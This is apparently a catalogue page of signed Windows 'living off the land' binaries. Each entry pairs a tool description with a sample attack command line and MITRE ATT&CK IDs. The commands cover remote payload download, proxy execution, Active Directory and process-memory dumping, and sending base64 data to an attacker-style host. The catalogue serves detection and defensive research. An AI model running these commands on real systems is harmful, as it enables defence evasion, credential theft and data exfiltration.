AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1
2 documented tactics
T1127T1218.007

AppCert.exe

Windows App Certification Kit command-line tool.

Sample Vector:
appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml}
1 documented tactics
T1127

AppLauncher.exe

User Experience Virtualization tool that launches applications under monitoring to capture and synchronize user settings.

Sample Vector:
AppLauncher.exe {PATH_ABSOLUTE:.exe}
2 documented tactics
T1218

Appvlp.exe

Application Virtualization Utility Included with Microsoft Office 2016

Sample Vector:
AppVLP.exe {PATH_SMB:.bat}
1 documented tactics
T1105

Bcp.exe

Microsoft SQL Server Bulk Copy Program utility for importing and exporting data between SQL Server instances and data files.

Sample Vector:
bcp "SELECT payload_data FROM database.dbo.payloads WHERE id=1" queryout "C:\Windows\Temp\payload.exe" -S localhost -T -c
6 documented tactics
T1218

Bginfo.exe

Background Information Utility included with SysInternals Suite

Sample Vector:
bginfo.exe {PATH:.bgi} /popup /nolicprompt
3 documented tactics
T1127

Cdb.exe

Debugging tool included with Windows Debugging Tools.

Sample Vector:
cdb.exe -cf {PATH:.wds} -o notepad.exe
3 documented tactics
T1055T1218

coregen.exe

Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.

Sample Vector:
coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name
1 documented tactics
T1003

Createdump.exe

Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)

Sample Vector:
createdump.exe -n -f {PATH:.dmp} {PID}
1 documented tactics
T1127

csi.exe

Command line interface included with Visual Studio.

Sample Vector:
csi.exe {PATH:.cs}
2 documented tactics
T1127

DbgSrv.exe

A process server included with Debugging Tools for Windows for remote user-mode debugging.

Sample Vector:
dbgsrv.exe -t tcp:port=5005 -c {CMD}
1 documented tactics
T1218

DefaultPack.EXE

This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider.

Sample Vector:
DefaultPack.EXE /C:"{CMD}"
1 documented tactics
T1218.007

Devinit.exe

Visual Studio 2019 tool

Sample Vector:
devinit.exe run -t msi-install -i {REMOTEURL:.msi}
2 documented tactics
T1127

Devtoolslauncher.exe

Binary will execute specified binary. Part of VS/VScode installation.

Sample Vector:
devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test
1 documented tactics
T1105

devtunnel.exe

Binary to enable forwarded ports on windows operating systems.

Sample Vector:
devtunnel.exe host -p 8080
1 documented tactics
T1127

dnx.exe

.NET Execution environment file included with .NET.

Sample Vector:
dnx.exe {PATH_ABSOLUTE:folder}
1 documented tactics
T1127

dotnet-counters.exe

.NET diagnostic tool for monitoring performance counters of .NET applications in real-time. Installed via 'dotnet tool install --global dotnet-counters' (.NET SDK required).

Sample Vector:
dotnet-counters.exe collect --duration 1 -- {PATH:.exe}
1 documented tactics
T1127

dotnet-trace.exe

.NET diagnostic tool for collecting runtime traces from .NET applications. Installed via 'dotnet tool install --global dotnet-trace' (.NET SDK required).

Sample Vector:
dotnet-trace.exe collect --duration 00:00:01 -- {PATH:.exe}
4 documented tactics
T1218T1059

Dotnet.exe

dotnet.exe comes with .NET Framework

Sample Vector:
dotnet.exe {PATH:.dll}
5 documented tactics
T1003.003

dsdbutil.exe

Dsdbutil is a command-line tool that is built into Windows Server. It is available if you have the AD LDS server role installed. Can be used as a command line utility to export Active Directory.

Sample Vector:
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
1 documented tactics
T1105

dtutil.exe

Microsoft command line utility used to manage SQL Server Integration Services packages.

Sample Vector:
dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext}
1 documented tactics
T1003.001

Dump64.exe

Memory dump tool that comes with Microsoft Visual Studio

Sample Vector:
dump64.exe {PID} out.dmp
1 documented tactics
T1003.001

DumpMinitool.exe

Dump tool part Visual Studio 2022

Sample Vector:
DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full
2 documented tactics
T1127

Dxcap.exe

DirectX diagnostics/debugger included with Visual Studio.

Sample Vector:
Dxcap.exe -c {PATH_ABSOLUTE:.exe}
1 documented tactics
T1105

ECMangen.exe

Command-line tool for managing certificates in Microsoft Exchange Server.

Sample Vector:
ECMangen.exe {REMOTEURL}
1 documented tactics
T1105

Excel.exe

Microsoft Office binary

Sample Vector:
Excel.exe {REMOTEURL}
2 documented tactics
T1059

Fsi.exe

64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.

Sample Vector:
fsi.exe {PATH:.fsscript}
2 documented tactics
T1059

FsiAnyCpu.exe

32/64-bit FSharp (F#) Interpreter included with Visual Studio.

Sample Vector:
fsianycpu.exe {PATH:.fsscript}
1 documented tactics
T1127

IntelliTrace.exe

Visual Studio command-line tool for collecting and managing diagnostic trace files.

Sample Vector:
IntelliTrace.exe launch /cp:"collectionplan.xml" /f:"c:\users\public\log" "C:\Windows\System32\calc.exe"
3 documented tactics
T1202

Logger.exe

A logging configuration tool from the Windows Kits used to start and manage process logging.

Sample Vector:
logger.exe RUN "{CMD}"
1 documented tactics
T1127

Mftrace.exe

Trace log generation tool for Media Foundation Tools.

Sample Vector:
Mftrace.exe {PATH:.exe}
1 documented tactics
T1127

Microsoft.NodejsTools.PressAnyKey.exe

Part of the NodeJS Visual Studio tools.

Sample Vector:
Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe}
1 documented tactics
T1127

Mpiexec.exe

Command-line tool for running Message Passing Interface (MPI) applications.

Sample Vector:
mpiexec.exe {CMD}
1 documented tactics
T1105

MSAccess.exe

Microsoft Office component

Sample Vector:
MSAccess.exe {REMOTEURL}
1 documented tactics
T1218.015

Mscopilot.exe

Microsoft Copilot app

Sample Vector:
mscopilot.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="{CMD} && taskkill /f /im mscopilot.exe &&"
1 documented tactics
T1218.015

Mscopilot_proxy.exe

Microsoft Copilot proxy launcher

Sample Vector:
mscopilot_proxy.exe --no-startup-window --disable-gpu-sandbox --gpu-launcher="cmd.exe /c calc.exe && taskkill /f /im mscopilot.exe &&"
3 documented tactics
T1218T1105

Msdeploy.exe

Microsoft tool used to deploy Web Applications.

Sample Vector:
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"
1 documented tactics
T1105

MsoHtmEd.exe

Microsoft Office component

Sample Vector:
MsoHtmEd.exe {REMOTEURL}
1 documented tactics
T1105

Mspub.exe

Microsoft Publisher

Sample Vector:
mspub.exe {REMOTEURL}
6 documented tactics
T1220T1105

msxsl.exe

Command line utility used to perform XSL transformations.

Sample Vector:
msxsl.exe {PATH:.xml} {PATH:.xsl}
1 documented tactics
T1040

Nmcap.exe

Command-line packet capture utility from Microsoft Network Monitor 3.x.

Sample Vector:
nmcap.exe /network * /capture /file {PATH_ABSOLUTE:.cap}
1 documented tactics
T1003.003

ntdsutil.exe

Command line utility used to export Active Directory.

Sample Vector:
ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
1 documented tactics
T1127

Ntsd.exe

Symbolic Debugger for Windows.

Sample Vector:
ntsd.exe -g {CMD}
1 documented tactics
T1202

OpenConsole.exe

Console Window host for Windows Terminal

Sample Vector:
OpenConsole.exe {PATH:.exe}
1 documented tactics
T1105

Outlook.exe

Microsoft Office component

Sample Vector:
Outlook.exe {REMOTEURL}
1 documented tactics
T1127

Pixtool.exe

Command line utility for taking and analyzing PIX GPU captures.

Sample Vector:
pixtool.exe launch {PATH_ABSOLUTE:.exe}
1 documented tactics
T1105

Powerpnt.exe

Microsoft Office binary.

Sample Vector:
Powerpnt.exe {REMOTEURL}
2 documented tactics
T1202

Procdump.exe

SysInternals Memory Dump Tool

Sample Vector:
procdump.exe -md {PATH:.dll} explorer.exe
1 documented tactics
T1105

ProtocolHandler.exe

Microsoft Office binary

Sample Vector:
ProtocolHandler.exe {REMOTEURL}
2 documented tactics
T1127

rcsi.exe

Non-Interactive command line inerface included with Visual Studio.

Sample Vector:
rcsi.exe {PATH:.csx}
3 documented tactics
T1127

Remote.exe

Debugging tool included with Windows Debugging Tools

Sample Vector:
Remote.exe /s {PATH:.exe} anythinghere
2 documented tactics
T1003T1003.001

Sqldumper.exe

Debugging utility included with Microsoft SQL.

Sample Vector:
sqldumper.exe 464 0 0x0110
1 documented tactics
T1218

Sqlps.exe

Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.

Sample Vector:
Sqlps.exe -noprofile
1 documented tactics
T1218

SQLToolsPS.exe

Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.

Sample Vector:
SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe}
5 documented tactics
T1218

Squirrel.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Sample Vector:
squirrel.exe --download {REMOTEURL}
2 documented tactics
T1127

te.exe

Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).

Sample Vector:
te.exe {PATH:.wsc}
3 documented tactics
T1218.015

Teams.exe

Electron runtime binary which runs the Teams application

Sample Vector:
teams.exe
1 documented tactics
T1048

TestWindowRemoteAgent.exe

TestWindowRemoteAgent.exe is the command-line tool to establish RPC

Sample Vector:
TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
2 documented tactics
T1127

Tracker.exe

Tool included with Microsoft .Net Framework.

Sample Vector:
Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe
13 documented tactics
T1218T1547

Update.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Sample Vector:
Update.exe --download {REMOTEURL}
1 documented tactics
T1105

Visio.exe

Microsoft Visio Executable

Sample Vector:
Visio.exe {REMOTEURL}
1 documented tactics
T1218

VisualUiaVerifyNative.exe

A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.

Sample Vector:
VisualUiaVerifyNative.exe
2 documented tactics
T1127

VSDiagnostics.exe

Command-line tool used for performing diagnostics.

Sample Vector:
VSDiagnostics.exe start 1 /launch:{PATH:.exe}
1 documented tactics
T1202

Vshadow.exe

VShadow is a command-line tool that can be used to create and manage volume shadow copies.

Sample Vector:
vshadow.exe -nw -exec={PATH_ABSOLUTE:.exe} C:
1 documented tactics
T1218

VSIISExeLauncher.exe

Binary will execute specified binary. Part of VS/VScode installation.

Sample Vector:
VSIISExeLauncher.exe -p {PATH:.exe} -a "{CMD:args}"
1 documented tactics
T1127

vsjitdebugger.exe

Just-In-Time (JIT) debugger included with Visual Studio

Sample Vector:
Vsjitdebugger.exe {PATH:.exe}
3 documented tactics
T1105T1127

VSLaunchBrowser.exe

Microsoft Visual Studio browser launcher tool for web applications debugging

Sample Vector:
VSLaunchBrowser.exe .exe {REMOTEURL:.exe}
1 documented tactics
T1218

vsls-agent.exe

Agent for Visual Studio Live Share (Code Collaboration)

Sample Vector:
vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}
1 documented tactics
T1127

vstest.console.exe

VSTest.Console.exe is the command-line tool to run tests

Sample Vector:
vstest.console.exe {PATH:.dll}
1 documented tactics
T1127

Wfc.exe

The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).

Sample Vector:
wfc.exe {PATH_ABSOLUTE:.xoml}
1 documented tactics
T1127

WFMFormat.exe

Command-line tool used for pretty-print a dump file generated by Message Farm Analyzer tool.

Sample Vector:
WFMFormat.exe
1 documented tactics
T1127

WinDbg.exe

Windows Debugger for advanced user-mode and kernel-mode debugging.

Sample Vector:
windbg.exe -g {CMD}
1 documented tactics
T1202

winfile.exe

Windows File Manager executable

Sample Vector:
winfile.exe {PATH:.exe}
1 documented tactics
T1105

WinProj.exe

Microsoft Project Executable

Sample Vector:
WinProj.exe {REMOTEURL}
1 documented tactics
T1105

Winword.exe

Microsoft Office binary

Sample Vector:
winword.exe {REMOTEURL}
3 documented tactics
T1564.006

wsb.exe

Windows Sandbox command-line interface. Creates, lists, controls, and executes commands inside Windows Sandbox sessions from the host CLI.

Sample Vector:
wsb start --config "<Configuration><LogonCommand><Command>{CMD}</Command></LogonCommand></Configuration>" wsb exec -r System --id YOUR_ID
5 documented tactics
T1202T1105

Wsl.exe

Windows subsystem for Linux executable

Sample Vector:
wsl.exe -e /mnt/c/Windows/System32/calc.exe
2 documented tactics
T1202

XBootMgr.exe

Windows Performance Toolkit binary used to start performance traces.

Sample Vector:
xbootmgr.exe -trace "{boot|hibernate|standby|shutdown|rebootCycle}" -callBack {PATH:.exe}
1 documented tactics
T1202

XBootMgrSleep.exe

Windows Performance Toolkit binary used for tracing and analyzing system performance during sleep and resume transitions.

Sample Vector:
xbootmgrsleep.exe 1000 {PATH:.exe}
1 documented tactics
T1105

xsd.exe

XML Schema Definition Tool included with the Windows Software Development Kit (SDK).

Sample Vector:
xsd.exe {REMOTEURL}
1 documented tactics
T1219.001

code.exe

VSCode binary, also portable (CLI) version

Sample Vector:
code.exe tunnel --accept-server-license-terms --name "tunnel-name"
1 documented tactics
T1105

GfxDownloadWrapper.exe

Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.

Sample Vector:
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point